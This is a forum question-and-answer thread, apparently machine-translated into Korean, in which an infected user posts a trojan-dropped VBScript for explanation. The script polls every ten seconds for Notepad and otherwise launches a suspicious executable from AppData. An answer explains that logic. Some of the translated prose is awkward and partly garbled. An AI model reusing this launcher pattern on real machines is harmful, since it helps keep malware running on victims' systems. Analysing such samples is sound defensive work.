2017-12-28 30 views
0

먼저 미안하다고 말하고 싶습니다.누군가이 코드를 이해하도록 도와 줄 수 있습니까? 트로이 Dropper VBS 스크립트에 감염 됨

이런 것들을 물어 보는 가장 좋은 장소는 아니지만 바이러스에 감염되어 흔적을 남기는 것 같습니다.

누군가가 일부 스크립트의 코드를 이해할 수 있다면 매우 감사 할 것입니다.

Option Explicit 
Dim ProcessPath,WshShell 
ProcessPath = "%Windir%\System32\Notepad.exe" 
Set WshShell = CreateObject("WScript.Shell") 
If AppPrevInstance() Then 
    MsgBox "There is an existing proceeding !" & VbCrLF &_ 
    CommandLineLike(WScript.ScriptName),VbExclamation,"There is an existing proceeding !"  
    WScript.Quit 
Else 
    Do 
     Pause(10) ' Pause 10 seconds 
     If CheckProcess(DblQuote(ProcessPath)) = False Then 
      Call Logoff() 
     End If 
    Loop 
End If 
'************************************************************************** 
Function CheckProcess(ProcessPath) 
    Dim strComputer,objWMIService,colProcesses,Tab,ProcessName 
    strComputer = "." 
    Tab = Split(ProcessPath,"\") 
    ProcessName = Tab(UBound(Tab)) 
    ProcessName = Replace(ProcessName,Chr(34),"") 
    Set objWMIService = GetObject("winmgmts:" _ 
    & "{impersonationLevel=impersonate}!\\" & strComputer & "\root\cimv2") 
    Set colProcesses = objWMIService.ExecQuery _ 
    ("Select * from Win32_Process Where Name = '"& ProcessName & "'") 
    If colProcesses.Count = 0 Then 
     CheckProcess = False 
    Else 
     CheckProcess = True 
    End if 
End Function 
'************************************************************************** 
Function DblQuote(Str) 
    DblQuote = Chr(34) & Str & Chr(34) 
End Function 
'************************************************************************** 
Sub Logoff() 
    Dim objShell 
Set objShell = WScript.CreateObject("WScript.Shell") 
objShell.Exec("C:\Users\Sblck\AppData\Local\AppVShNotifyt.exe") 
Set objShell = Nothing 
Wscript.Quit 
End sub 
'************************************************************************** 
Sub Pause(Secs)  
    Wscript.Sleep(Secs * 1000)  
End Sub 
'************************************************************************** 
Function AppPrevInstance() 
    With GetObject("winmgmts:" & "{impersonationLevel=impersonate}!\\.\root\cimv2") 
     With .ExecQuery("SELECT * FROM Win32_Process WHERE CommandLine LIKE " & CommandLineLike(WScript.ScriptFullName) & _ 
      " AND CommandLine LIKE '%WScript%' OR CommandLine LIKE '%cscript%'") 
      AppPrevInstance = (.Count > 1) 
     End With 
    End With 
End Function  
'*************************************************************************** 
Function CommandLineLike(ProcessPath) 
    ProcessPath = Replace(ProcessPath, "\", "\\") 
    CommandLineLike = "'%" & ProcessPath & "%'" 
End Function 
'**************************************************************************** 

좀 다른 스크립트가, 내가 코드를 오른쪽 형식의 희망하지만, TXT 형태의 diference는이 같은 "% 일 %"에 리모트 objShell.Exec 에 있습니다

그것은 쉽게

AppVShNotifytvbs.vbs PasteBin link

을 만드는 경우
objShell.Exec("%working%")^ 

나는 그것의 거 포스트 페이스트 빈 년대 해요3210

AppVShNotifytvbs.txt Pastebin link

+2

이 질문은 [정보 보안] (https://security.stackexchange.com/)에 속해 있으므로 오프 토픽으로 닫으려고합니다. –

+0

그냥이 VBScript를 어디서 얻었 을까? 원래 스크립트가 수정 된 스크립트가 아님을 의미합니까? – Hackoo

+0

내가 의심스런 프로그램을 실행 시켰고, 빠른 cmd가 인스턴스가 실행 중일 때 팝업으로 나타나서 시스템을 검사하기 위해 서둘러서 스크립트가 exe (두 프로그램 모두)에 의해 xml 파일과 non 확장 기능. 주 프로그램은 트로이 목마처럼 행동했으며, AppVShNotifyt.exe와 내 드라이브에있는 스크립트가있는 것 같습니다. –

답변

0

먼저, 이전 인스턴스를 검사하여 현재 스크립트가 이미 다른 프로세스 ID를 사용하여 실행 중인지 확인합니다.

그런 다음 10 초마다 메모장이 실행 중인지 확인합니다. 그렇지 않으면 AppVShNotifyt.exe가 호출됩니다.

+0

감사합니다 !!! 그 생각이 내 마음을 횡단했다, 나는 주된 exe가 삭제 된 수많은 바이러스 백신을 실행했다. 그러나 다른 흔적은 그 스크립트처럼 남아있다. xml 파일들, 나는 단지 질수를 이해할 수 없다. 왜 메모장이 실행되고 있는지 확인한다. –

+0

im 그냥 메모장의 MD5를 확인해 보겠습니다. –